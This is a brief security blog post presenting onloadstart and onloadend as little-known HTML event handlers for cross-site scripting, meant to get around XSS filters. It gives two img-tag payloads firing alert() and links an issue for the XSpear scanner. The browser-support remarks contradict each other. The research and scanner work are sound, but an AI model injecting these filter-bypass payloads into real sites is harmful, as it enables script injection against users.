onload*(start/end) event handler XSS(Any browser)
Hi hackers. Last time I wrote about onpointer * xss, I write a not well-known event-handle for xss now. (https://www.hahwul.com/2019/07/onpoint-xss-payload-for-bypass-xss-protection.html)
onload* event handler for XSS
it’s onload* handler! Handlers that usually start with onload are well known, but onloadstart and onloadend are not well known.
<!-- onloadstart -->
<!-- Any browser, but not use <img> tag.. -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadstart="alert(45)">
<!-- onloadend -->
<!-- only firefox -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadend="alert(45)">
 |
|---|
| onloadstar tested my site. it’s work! |
But, just only in Firefox.
for XSpear
add eventhandler pattern! https://github.com/hahwul/XSpear/issues/18
 |
|---|
| You’re welcome(img refer giphy.com) |